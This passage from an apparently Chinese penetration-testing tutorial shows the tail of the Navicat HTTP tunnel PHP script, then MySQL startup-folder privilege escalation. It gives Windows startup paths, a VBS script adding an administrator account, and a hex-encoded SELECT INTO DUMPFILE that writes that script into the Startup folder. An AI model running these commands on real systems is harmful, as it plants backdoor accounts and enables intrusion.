host:port.</span></span><br><span class="line"> <span class="comment">// ext/mysql was removed in PHP 7, so this branch only runs on older PHP.</span></span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$_POST</span>[<span class="string">"port"</span>] ) <span class="variable">$hs</span> .= <span class="string">":"</span>.<span class="variable">$_POST</span>[<span 
class="string">"port"</span>];</span><br><span class="line"> <span class="variable">$conn</span> = mysql_connect(<span class="variable">$hs</span>, <span class="variable">$_POST</span>[<span class="string">"login"</span>], <span class="variable">$_POST</span>[<span class="string">"password"</span>]);</span><br><span class="line"> <span class="variable">$errno_c</span> = mysql_errno();</span><br><span class="line"> <span class="comment">//if (phpversion_int() >= 50203){ // for unicode database name</span></span><br><span class="line"> <span class="comment">// mysql_set_charset('UTF8');</span></span><br><span class="line"> <span class="comment">//}</span></span><br><span class="line"> <span class="keyword">if</span>((<span class="variable">$errno_c</span> <= <span class="number">0</span>) && ( <span class="variable">$_POST</span>[<span class="string">"db"</span>] != <span class="string">""</span> )) {</span><br><span class="line"> <span class="variable">$res</span> = mysql_select_db( <span class="variable">$_POST</span>[<span class="string">"db"</span>], <span class="variable">$conn</span>);</span><br><span class="line"> <span class="variable">$errno_c</span> = mysql_errno();</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> EchoHeader(<span class="variable">$errno_c</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$errno_c</span> > <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">echo</span> GetBlock(mysql_error());</span><br><span class="line"> } <span class="keyword">elseif</span>(<span class="variable">$_POST</span>[<span class="string">"actn"</span>] == <span class="string">"C"</span>) {</span><br><span class="line"> EchoConnInfo(<span class="variable">$conn</span>);</span><br><span class="line"> } <span class="keyword">elseif</span>(<span class="variable">$_POST</span>[<span class="string">"actn"</span>] == <span class="string">"Q"</span>) 
{</span><br><span class="line"> <span class="keyword">for</span>(<span class="variable">$i</span>=<span class="number">0</span>;<span class="variable">$i</span><count(<span class="variable">$_POST</span>[<span class="string">"q"</span>]);<span class="variable">$i</span>++) {</span><br><span class="line"> <span class="variable">$query</span> = <span class="variable">$_POST</span>[<span class="string">"q"</span>][<span class="variable">$i</span>];</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$query</span> == <span class="string">""</span>) <span class="keyword">continue</span>;</span><br><span class="line"> <span class="keyword">if</span> (phpversion_int() < <span class="number">50400</span>){ </span><br><span class="line"> <span class="keyword">if</span>(get_magic_quotes_gpc())</span><br><span class="line"> <span class="variable">$query</span> = stripslashes(<span class="variable">$query</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="variable">$res</span> = mysql_query(<span class="variable">$query</span>, <span class="variable">$conn</span>);</span><br><span class="line"> <span class="variable">$errno</span> = mysql_errno();</span><br><span class="line"> <span class="variable">$affectedrows</span> = mysql_affected_rows(<span class="variable">$conn</span>);</span><br><span class="line"> <span class="variable">$insertid</span> = mysql_insert_id(<span class="variable">$conn</span>);</span><br><span class="line"> <span class="comment">// NOTE(review): unlike the mysqli branch, $res is not checked against false here, so a failed</span></span><br><span class="line"> <span class="comment">// query still reaches mysql_num_fields()/mysql_num_rows()/mysql_free_result() (warnings only).</span></span><br><span class="line"> <span class="variable">$numfields</span> = mysql_num_fields(<span class="variable">$res</span>);</span><br><span class="line"> <span class="variable">$numrows</span> = mysql_num_rows(<span class="variable">$res</span>);</span><br><span class="line"> EchoResultSetHeader(<span class="variable">$errno</span>, <span class="variable">$affectedrows</span>, <span class="variable">$insertid</span>, <span class="variable">$numfields</span>, <span 
class="variable">$numrows</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$errno</span> > <span class="number">0</span>)</span><br><span class="line"> <span class="keyword">echo</span> GetBlock(mysql_error());</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$numfields</span> > <span class="number">0</span>) {</span><br><span class="line"> EchoFieldsHeader(<span class="variable">$res</span>, <span class="variable">$numfields</span>);</span><br><span class="line"> EchoData(<span class="variable">$res</span>, <span class="variable">$numfields</span>, <span class="variable">$numrows</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">if</span>(phpversion_int() >= <span class="number">40300</span>)</span><br><span class="line"> <span class="keyword">echo</span> GetBlock(mysql_info(<span class="variable">$conn</span>));</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="keyword">echo</span> GetBlock(<span class="string">""</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$i</span><(count(<span class="variable">$_POST</span>[<span class="string">"q"</span>])-<span class="number">1</span>))</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"\x01"</span>;</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"\x00"</span>;</span><br><span class="line"> mysql_free_result(<span class="variable">$res</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span 
class="keyword">exit</span>();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Test-menu mode (no tunnel parameters posted and $allowTestMenu set): serve the HTML tester below.</span></span><br><span class="line"> header(<span class="string">"Content-Type: text/html"</span>);</span><br><span class="line"><span class="comment">////</span></span><br><span class="line"><span class="comment">/////////////////////////////////////////////////////////////////////////////</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></span><br><span class="line"><!DOCTYPE html <span class="keyword">PUBLIC</span> <span class="string">"-//W3C//DTD HTML 4.01 Transitional//EN"</span> <span class="string">"http://www.w3.org/TR/html4/loose.dtd"</span>></span><br><span class="line"><html></span><br><span class="line"><head></span><br><span class="line"> <title>Navicat HTTP Tunnel Tester</title></span><br><span class="line"> <meta http-equiv=<span class="string">"Content-Type"</span> content=<span class="string">"text/html; charset=ISO-8859-1"</span>></span><br><span class="line"> <style type=<span class="string">"text/css"</span>></span><br><span class="line"> body{</span><br><span class="line"> margin: <span class="number">30</span>px;</span><br><span class="line"> font-family: Tahoma;</span><br><span class="line"> font-weight: normal;</span><br><span class="line"> font-size: <span class="number">14</span>px;</span><br><span class="line"> color: <span class="comment">#222222;</span></span><br><span class="line"> }</span><br><span class="line"> table{</span><br><span class="line"> width: <span class="number">100</span>%;</span><br><span class="line"> border: <span class="number">0</span>px;</span><br><span class="line"> }</span><br><span class="line"> input{</span><br><span class="line"> font-family:Tahoma,sans-serif;</span><br><span class="line"> border-style:solid;</span><br><span class="line"> border-color:<span class="comment">#666666;</span></span><br><span class="line"> border-width:<span class="number">1</span>px;</span><br><span 
class="line"> }</span><br><span class="line"> fieldset{</span><br><span class="line"> border-style:solid;</span><br><span class="line"> border-color:<span class="comment">#666666;</span></span><br><span class="line"> border-width:<span class="number">1</span>px;</span><br><span class="line"> }</span><br><span class="line"> .Title1{</span><br><span class="line"> font-size: <span class="number">30</span>px;</span><br><span class="line"> color: <span class="comment">#003366;</span></span><br><span class="line"> }</span><br><span class="line"> .Title2{</span><br><span class="line"> font-size: <span class="number">10</span>px;</span><br><span class="line"> color: <span class="comment">#999966;</span></span><br><span class="line"> }</span><br><span class="line"> .TestDesc{</span><br><span class="line"> width:<span class="number">70</span>%</span><br><span class="line"> }</span><br><span class="line"> .TestSucc{</span><br><span class="line"> color: <span class="comment">#00BB00;</span></span><br><span class="line"> }</span><br><span class="line"> .TestFail{</span><br><span class="line"> color: <span class="comment">#DD0000;</span></span><br><span class="line"> }</span><br><span class="line"> .mysql{</span><br><span class="line"> }</span><br><span class="line"> .pgsql{</span><br><span class="line"> display:none;</span><br><span class="line"> }</span><br><span class="line"> .sqlite{</span><br><span class="line"> display:none;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">#page{</span></span><br><span class="line"> max-width: <span class="number">42</span>em;</span><br><span class="line"> min-width: <span class="number">36</span>em;</span><br><span class="line"> border-width: <span class="number">0</span>px;</span><br><span class="line"> margin: auto auto;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">#host, #dbfile{</span></span><br><span class="line"> width: <span 
class="number">300</span>px;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">#port{</span></span><br><span class="line"> width: <span class="number">75</span>px;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">#login, #password, #db{</span></span><br><span class="line"> width: <span class="number">150</span>px;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">#Copyright{</span></span><br><span class="line"> text-align: right;</span><br><span class="line"> font-size: <span class="number">10</span>px;</span><br><span class="line"> color: <span class="comment">#888888;</span></span><br><span class="line"> }</span><br><span class="line"> </style></span><br><span class="line"> <script type=<span class="string">"text/javascript"</span>></span><br><span class="line"> <span class="comment">// Returns the IE version parsed from the user agent, or -1 for any other browser.</span></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">getInternetExplorerVersion</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="keyword">var</span> ver = -<span class="number">1</span>;</span><br><span class="line"> <span class="keyword">if</span> (navigator.appName == <span class="string">"Microsoft Internet Explorer"</span>){</span><br><span class="line"> <span class="keyword">var</span> regex = <span class="keyword">new</span> RegExp(<span class="string">"MSIE ([0-9]{1,}[\.0-9]{0,})"</span>);</span><br><span class="line"> <span class="keyword">if</span> (regex.exec(navigator.userAgent))</span><br><span class="line"> ver = parseFloat(RegExp.$<span class="number">1</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> ver;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">// Writes text into element and colours it via the TestSucc/TestFail classes.</span></span><br><span class="line"> <span class="comment">// NOTE(review): the failure text comes from the tunnel response, i.e. the error string returned by</span></span><br><span class="line"> <span class="comment">// whatever MySQL server was named in the form, and it is assigned to innerHTML; a hostile server</span></span><br><span class="line"> <span class="comment">// could inject markup that way. textContent is the safe sink for plain text.</span></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">setText</span>(<span class="params">element, text, succ</span>)</span>{</span><br><span class="line"> element.className = 
(succ)?<span class="string">"TestSucc"</span>:<span class="string">"TestFail"</span>;</span><br><span class="line"> element.innerHTML = text;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">// Byte at offset of the binary response string; the 0xff mask presumably folds charset-mapped</span></span><br><span class="line"> <span class="comment">// code points above 255 back to the raw byte.</span></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">getByteAt</span>(<span class="params">str, offset</span>)</span>{</span><br><span class="line"> <span class="keyword">return</span> str.charCodeAt(offset) & <span class="number">0xff</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">// Big-endian 32-bit integer at offset (used for the errno field of the response header).</span></span><br><span class="line"> <span class="comment">// NOTE(review): only the last term is forced unsigned, so values with the top bit set come back</span></span><br><span class="line"> <span class="comment">// negative; harmless for the small error numbers read here.</span></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">getIntAt</span>(<span class="params">binStr, offset</span>)</span>{</span><br><span class="line"> <span class="keyword">return</span> (getByteAt(binStr, offset) << <span class="number">24</span>)+</span><br><span class="line"> (getByteAt(binStr, offset+<span class="number">1</span>) << <span class="number">16</span>)+</span><br><span class="line"> (getByteAt(binStr, offset+<span class="number">2</span>) << <span class="number">8</span>)+</span><br><span class="line"> (getByteAt(binStr, offset+<span class="number">3</span>) >>> <span class="number">0</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">// Length-prefixed string block: one length byte when it is below 254, otherwise a marker byte</span></span><br><span class="line"> <span class="comment">// followed by a 4-byte big-endian length, with the data starting at offset+5.</span></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">getBlockStr</span>(<span class="params">binStr, offset</span>)</span>{</span><br><span class="line"> <span class="keyword">if</span> (getByteAt(binStr, offset) < <span class="number">254</span>)</span><br><span class="line"> <span class="keyword">return</span> binStr.substring(offset+<span class="number">1</span>, offset+<span class="number">1</span>+binStr.charCodeAt(offset));</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="keyword">return</span> binStr.substring(offset+<span class="number">5</span>, offset+<span class="number">5</span>+getIntAt(binStr, offset+<span 
class="number">1</span>));</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">// Posts the Server Test form back to this script as a tunnel request (the hidden actn=C) and shows</span></span><br><span class="line"> <span class="comment">// the outcome: errno is read at offset 6 of the response header, the error text block at offset 16.</span></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">doServerTest</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="keyword">var</span> version = getInternetExplorerVersion();</span><br><span class="line"> <span class="keyword">if</span> (version==-<span class="number">1</span> || version>=<span class="number">9.0</span>){</span><br><span class="line"> <span class="keyword">var</span> xmlhttp = (window.XMLHttpRequest)? <span class="keyword">new</span> XMLHttpRequest() : xmlhttp=<span class="keyword">new</span> ActiveXObject(<span class="string">"Microsoft.XMLHTTP"</span>);</span><br><span class="line"> </span><br><span class="line"> xmlhttp.onreadystatechange=<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="keyword">var</span> outputDiv = document.getElementById(<span class="string">"ServerTest"</span>);</span><br><span class="line"> <span class="keyword">if</span> (xmlhttp.readyState == <span class="number">4</span>){</span><br><span class="line"> <span class="keyword">if</span> (xmlhttp.status == <span class="number">200</span>){</span><br><span class="line"> <span class="keyword">var</span> errno = getIntAt(xmlhttp.responseText, <span class="number">6</span>);</span><br><span class="line"> <span class="keyword">if</span> (errno == <span class="number">0</span>)</span><br><span class="line"> setText(outputDiv, <span class="string">"Connection Success!"</span>, <span class="literal">true</span>);</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> setText(outputDiv, parseInt(errno)+<span class="string">" - "</span>+getBlockStr(xmlhttp.responseText, <span class="number">16</span>), <span class="literal">false</span>);</span><br><span class="line"> }<span 
class="keyword">else</span></span><br><span class="line"> setText(outputDiv, <span class="string">"HTTP Error - "</span>+xmlhttp.status, <span class="literal">false</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Serialises every form control as id=value; the ids match the $_POST keys the PHP side reads.</span></span><br><span class="line"> <span class="keyword">var</span> params = <span class="string">""</span>;</span><br><span class="line"> <span class="keyword">var</span> form = document.getElementById(<span class="string">"TestServerForm"</span>);</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> i=<span class="number">0</span>; i<form.elements.length; i++){</span><br><span class="line"> <span class="keyword">if</span> (i><span class="number">0</span>) params += <span class="string">"&"</span>;</span><br><span class="line"> <span class="comment">// NOTE(review): replace() with a string pattern only rewrites the first ampersand, and "=", "+" and</span></span><br><span class="line"> <span class="comment">// "%" are not encoded at all, so a password containing any of them reaches the server altered.</span></span><br><span class="line"> <span class="comment">// encodeURIComponent(form.elements[i].value) is the correct encoding here.</span></span><br><span class="line"> params += form.elements[i].id+<span class="string">"="</span>+form.elements[i].value.replace(<span class="string">"&"</span>, <span class="string">"%26"</span>);</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> document.getElementById(<span class="string">"ServerTest"</span>).className = <span class="string">""</span>;</span><br><span class="line"> document.getElementById(<span class="string">"ServerTest"</span>).innerHTML = <span class="string">"Connecting..."</span>;</span><br><span class="line"> xmlhttp.open(<span class="string">"POST"</span>, <span class="string">""</span>, <span class="literal">true</span>);</span><br><span class="line"> xmlhttp.setRequestHeader(<span class="string">"Content-type"</span>, <span class="string">"application/x-www-form-urlencoded"</span>);</span><br><span class="line"> <span class="comment">// NOTE(review): Content-length and Connection are forbidden XMLHttpRequest request headers and are</span></span><br><span class="line"> <span class="comment">// silently ignored by browsers; the next two lines are no-ops.</span></span><br><span class="line"> xmlhttp.setRequestHeader(<span class="string">"Content-length"</span>, params.length);</span><br><span class="line"> xmlhttp.setRequestHeader(<span class="string">"Connection"</span>, <span class="string">"close"</span>);</span><br><span class="line"> xmlhttp.send(params);</span><br><span 
class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> document.getElementById(<span class="string">"ServerTest"</span>).className = <span class="string">""</span>;</span><br><span class="line"> document.getElementById(<span class="string">"ServerTest"</span>).innerHTML = <span class="string">"Internet Explorer "</span>+version+<span class="string">" is not supported, please use Internet explorer 9.0 or above, firefox, chrome or safari"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </script></span><br><span class="line"></head></span><br><span class="line"></span><br><span class="line"><body></span><br><span class="line"><div id=<span class="string">"page"</span>></span><br><span class="line"><p></span><br><span class="line"> <font <span class="class"><span class="keyword">class</span>="<span class="title">Title1</span>"><span class="title">Navicat</span>&<span class="title">trade</span>;</<span class="title">font</span>><<span class="title">br</span>></span></span><br><span class="line"><span class="class"> <<span class="title">font</span> <span class="title">class</span>="<span class="title">Title2</span>"><span class="title">The</span> <span class="title">gateway</span> <span class="title">to</span> <span class="title">your</span> <span class="title">database</span>!</<span class="title">font</span>></span></span><br><span class="line"><span class="class"></<span class="title">p</span>></span></span><br><span class="line"><span class="class"><<span class="title">fieldset</span>></span></span><br><span class="line"><span class="class"> <<span class="title">legend</span>><span class="title">System</span> <span class="title">Environment</span> <span class="title">Test</span></<span class="title">legend</span>></span></span><br><span class="line"><span class="class"> <<span class="title">table</span>></span></span><br><span class="line"><span class="class"> <<span 
class="title">tr</span> <span class="title">style</span>="<?<span class="title">php</span> <span class="title">echo</span> "<span class="title">display</span>:<span class="title">none</span>"; ?>"><<span class="title">td</span> <span class="title">width</span>=70%><span class="title">PHP</span> <span class="title">installed</span> <span class="title">properly</span></<span class="title">td</span>><<span class="title">td</span> <span class="title">class</span>="<span class="title">TestFail</span>"><span class="title">No</span></<span class="title">td</span>></<span class="title">tr</span>></span></span><br><span class="line"><span class="class"> <?<span class="title">php</span> <span class="title">echo</span> <span class="title">doSystemTest</span>();?></span></span><br><span class="line"><span class="class"> </<span class="title">table</span>></span></span><br><span class="line"><span class="class"></<span class="title">fieldset</span>></span></span><br><span class="line"><span class="class"><<span class="title">br</span>></span></span><br><span class="line"><span class="class"><<span class="title">fieldset</span>></span></span><br><span class="line"><span class="class"> <<span class="title">legend</span>><span class="title">Server</span> <span class="title">Test</span></<span class="title">legend</span>></span></span><br><span class="line"><span class="class"> <<span class="title">form</span> <span class="title">id</span>="<span class="title">TestServerForm</span>" <span class="title">action</span>="#" <span class="title">onSubmit</span>="<span class="title">return</span> <span class="title">false</span>;"></span></span><br><span class="line"><span class="class"> <<span class="title">input</span> <span class="title">type</span>=<span class="title">hidden</span> <span class="title">id</span>="<span class="title">actn</span>" <span class="title">value</span>="<span class="title">C</span>"></span></span><br><span class="line"><span class="class"> <<span 
class="title">table</span>></span></span><br><span class="line"><span class="class"> <<span class="title">tr</span> <span class="title">class</span>="<span class="title">mysql</span>"><<span class="title">td</span> <span class="title">width</span>="35%"><span class="title">Hostname</span>/<span class="title">IP</span> <span class="title">Address</span>:</<span class="title">td</span>><<span class="title">td</span>><<span class="title">input</span> <span class="title">type</span>=<span class="title">text</span> <span class="title">id</span>="<span class="title">host</span>" <span class="title">placeholder</span>="<span class="title">localhost</span>"></<span class="title">td</span>></<span class="title">tr</span>></span></span><br><span class="line"><span class="class"> <<span class="title">tr</span> <span class="title">class</span>="<span class="title">mysql</span>"><<span class="title">td</span>><span class="title">Port</span>:</<span class="title">td</span>><<span class="title">td</span>><<span class="title">input</span> <span class="title">type</span>=<span class="title">text</span> <span class="title">id</span>="<span class="title">port</span>" <span class="title">placeholder</span>="3306"></<span class="title">td</span>></<span class="title">tr</span>></span></span><br><span class="line"><span class="class"> <<span class="title">tr</span> <span class="title">class</span>="<span class="title">pgsql</span>"><<span class="title">td</span>><span class="title">Initial</span> <span class="title">Database</span>:</<span class="title">td</span>><<span class="title">td</span>><<span class="title">input</span> <span class="title">type</span>=<span class="title">text</span> <span class="title">id</span>="<span class="title">db</span>" <span class="title">placeholder</span>="<span class="title">template1</span>"></<span class="title">td</span>></<span class="title">tr</span>></span></span><br><span class="line"><span class="class"> <<span class="title">tr</span> <span 
class="title">class</span>="<span class="title">mysql</span>"><<span class="title">td</span>><span class="title">Username</span>:</<span class="title">td</span>><<span class="title">td</span>><<span class="title">input</span> <span class="title">type</span>=<span class="title">text</span> <span class="title">id</span>="<span class="title">login</span>" <span class="title">placeholder</span>="<span class="title">root</span>"></<span class="title">td</span>></<span class="title">tr</span>></span></span><br><span class="line"><span class="class"> <<span class="title">tr</span> <span class="title">class</span>="<span class="title">mysql</span>"><<span class="title">td</span>><span class="title">Password</span>:</<span class="title">td</span>><<span class="title">td</span>><<span class="title">input</span> <span class="title">type</span>=<span class="title">password</span> <span class="title">id</span>="<span class="title">password</span>" <span class="title">placeholder</span>=""></<span class="title">td</span>></<span class="title">tr</span>></span></span><br><span class="line"><span class="class"> <<span class="title">tr</span> <span class="title">class</span>="<span class="title">sqlite</span>"><<span class="title">td</span>><span class="title">Database</span> <span class="title">File</span>:</<span class="title">td</span>><<span class="title">td</span>><<span class="title">input</span> <span class="title">type</span>=<span class="title">text</span> <span class="title">id</span>="<span class="title">dbfile</span>" <span class="title">placeholder</span>="<span class="title">sqlite</span>.<span class="title">db</span>"></<span class="title">td</span>></<span class="title">tr</span>></span></span><br><span class="line"><span class="class"> <<span class="title">tr</span>><<span class="title">td</span>></<span class="title">td</span>><<span class="title">td</span>><<span class="title">br</span>><<span class="title">input</span> <span class="title">id</span>="<span 
class="title">TestButton</span>" <span class="title">type</span>="<span class="title">submit</span>" <span class="title">value</span>="<span class="title">Test</span> <span class="title">Connection</span>" <span class="title">onClick</span>="<span class="title">doServerTest</span>()"></<span class="title">td</span>></<span class="title">tr</span>></span></span><br><span class="line"><span class="class"> </<span class="title">table</span>></span></span><br><span class="line"><span class="class"> </<span class="title">form</span>></span></span><br><span class="line"><span class="class"> <<span class="title">div</span> <span class="title">id</span>="<span class="title">ServerTest</span>"><<span class="title">br</span>></<span class="title">div</span>></span></span><br><span class="line"><span class="class"></<span class="title">fieldset</span>></span></span><br><span class="line"><span class="class"><<span class="title">p</span> <span class="title">id</span>="<span class="title">Copyright</span>"><span class="title">Copyright</span> &<span class="title">copy</span>; <span class="title">PremiumSoft</span> &<span class="title">trade</span>; <span class="title">CyberTech</span> <span class="title">Ltd</span>. <span class="title">All</span> <span class="title">Rights</span> <span class="title">Reserved</span>.</<span class="title">p</span>></span></span><br><span class="line"><span class="class"></<span class="title">div</span>></span></span><br><span class="line"><span class="class"></<span class="title">body</span>></span></span><br><span class="line"><span class="class"></<span class="title">html</span>></span></span><br></pre></td></tr></table></figure>
<p>然后连接Navicat,选择HTTP通道,输入指向上述PHP脚本的远程链接</p>
<p>然后地址填写本地<code>localhost</code>,选择连接,之后就可以执行MySQL命令了</p>
<h2 id="启动项提权"><a href="#启动项提权" class="headerlink" title="启动项提权"></a>启动项提权</h2><p>当 Windows 的启动项目录可以被 MySQL 写入时,可以使用 MySQL 将自定义脚本导入到启动项中,这个脚本会在用户登录、开机、关机的时候自动运行。</p>
<p><strong>启动项路径</strong></p>
<p><strong>Windows Server 2003</strong> 的启动项路径</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 中文系统</span></span><br><span class="line">C:\Documents and Settings\Administrator\「开始」菜单\程序\启动</span><br><span class="line">C:\Documents and Settings\All Users\「开始」菜单\程序\启动</span><br><span class="line"></span><br><span class="line"><span class="comment"># 英文系统</span></span><br><span class="line">C:\Documents and Settings\Administrator\Start Menu\Programs\Startup</span><br><span class="line">C:\Documents and Settings\All Users\Start Menu\Programs\Startup</span><br><span class="line"></span><br><span class="line"><span class="comment"># 开关机项 需要自己建立对应文件夹</span></span><br><span class="line">C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup</span><br><span class="line">C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Shutdown</span><br></pre></td></tr></table></figure>
<p><strong>Windows Server 2008</strong> 的启动项路径</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</span><br><span class="line">C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup</span><br></pre></td></tr></table></figure>
<p>既然知道路径的话就往启动项路径里面写入脚本吧,脚本支持 vbs 和 exe 类型,可以利用 vbs 执行一些 CMD 命令,也可以使用 exe 上线 MSF 或者 CS,这方面还是比较灵活的。下面是一个执行基础命令的 VBS 脚本</p>
<figure class="highlight vbscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">Set</span> WshShell=WScript.<span class="built_in">CreateObject</span>(<span class="string">"WScript.Shell"</span>)</span><br><span class="line">WshShell.Run <span class="string">"net user hacker P@ssw0rd /add"</span>, <span class="number">0</span></span><br><span class="line">WshShell.Run <span class="string">"net localgroup administrators hacker /add"</span>, <span class="number">0</span></span><br></pre></td></tr></table></figure>
<p>将上述 vbs 脚本或者 CS 的木马转为十六进制后,直接写入到系统启动项目录中,然后等待系统用户重新登录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql > select 0x536574205773685368656C6C3D575363726970742E4372656174654F626A6563742822575363726970742E5368656C6C22290A5773685368656C6C2E52756E20226E65742075736572206861636B6572205040737377307264202F616464222C20300A5773685368656C6C2E52756E20226E6574206C6F63616C67726F75702061646D696E6973747261746F7273206861636B6572202F616464222C20300A into dumpfile "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\test.vbs";</span><br></pre></td></tr></table></figure>